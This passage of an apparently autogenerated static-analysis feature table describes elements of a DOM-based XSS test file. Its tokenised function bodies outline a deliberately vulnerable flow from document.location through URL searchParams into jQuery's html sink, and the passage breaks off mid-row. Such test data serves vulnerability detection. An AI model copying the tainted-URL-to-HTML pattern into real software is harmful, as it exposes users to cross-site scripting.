URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:326:10:326:22 | getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | exceptional return of new URL ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | exceptional return of new URL ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | exceptional return of new URL ... cation) | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | exceptional return of new URL ... cation) | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | exceptional return of new URL ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | new URL ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | new URL ... cation) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | new URL ... cation) | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | new URL ... cation) | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:327:10:327:35 | new URL ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:327:14:327:16 | URL | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:327:14:327:16 | URL | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:327:14:327:16 | URL | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:327:14:327:16 | URL | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:327:14:327:16 | URL | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:25 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:25 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:25 | document | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:25 | document | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:25 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | CalleeFlexibleAccessPath | URL | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:327:18:327:34 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:327:27:327:34 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:327:27:327:34 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:327:27:327:34 | location | enclosingFunctionBody | URL document location | +| autogenerated/Xss/DomBasedXss/tst.js:327:27:327:34 | location | enclosingFunctionName | getTaintedUrl | +| autogenerated/Xss/DomBasedXss/tst.js:327:27:327:34 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | getTaintedUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | getTaintedUrl | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | getTaintedUrl | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | this | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | this | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:330:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | 'arguments' object of function URLPseudoProperties | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | 'arguments' object of function URLPseudoProperties | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | 'arguments' object of function URLPseudoProperties | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | 'arguments' object of function URLPseudoProperties | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | 'arguments' object of function URLPseudoProperties | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | exceptional return of function URLPseudoProperties | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | exceptional return of function URLPseudoProperties | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | exceptional return of function URLPseudoProperties | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | exceptional return of function URLPseudoProperties | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | exceptional return of function URLPseudoProperties | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | functio ... URL)\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | functio ... URL)\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | functio ... URL)\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | return of function URLPseudoProperties | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | return of function URLPseudoProperties | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | return of function URLPseudoProperties | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | return of function URLPseudoProperties | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:330:1:336:1 | return of function URLPseudoProperties | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:330:10:330:28 | URLPseudoProperties | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:330:10:330:28 | URLPseudoProperties | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:330:10:330:28 | URLPseudoProperties | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:12 | params | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:12 | params | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:12 | params | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:12 | params | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:12 | params | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params ... hParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params ... hParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params ... hParams | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params ... hParams | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:7:331:43 | params ... hParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:28 | getTaintedUrl | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:28 | getTaintedUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:28 | getTaintedUrl | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:28 | getTaintedUrl | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:28 | getTaintedUrl | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | exceptional return of getTaintedUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | exceptional return of getTaintedUrl() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | exceptional return of getTaintedUrl() | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | exceptional return of getTaintedUrl() | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | exceptional return of getTaintedUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | getTaintedUrl() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | getTaintedUrl() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | getTaintedUrl() | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | getTaintedUrl() | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:30 | getTaintedUrl() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:43 | getTain ... hParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:43 | getTain ... hParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:43 | getTain ... hParams | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:43 | getTain ... hParams | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:16:331:43 | getTain ... hParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:331:32:331:43 | searchParams | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:331:32:331:43 | searchParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:331:32:331:43 | searchParams | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:331:32:331:43 | searchParams | enclosingFunctionName | URLPseudoProperties | +| autogenerated/Xss/DomBasedXss/tst.js:331:32:331:43 | searchParams | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:3 | $ | enclosingFunctionBody | params getTaintedUrl searchParams $ name html params get name myUrl getTaintedUrl $ name html myUrl get name | +| autogenerated/Xss/DomBasedXss/tst.js:332:3:332:3 | $ | 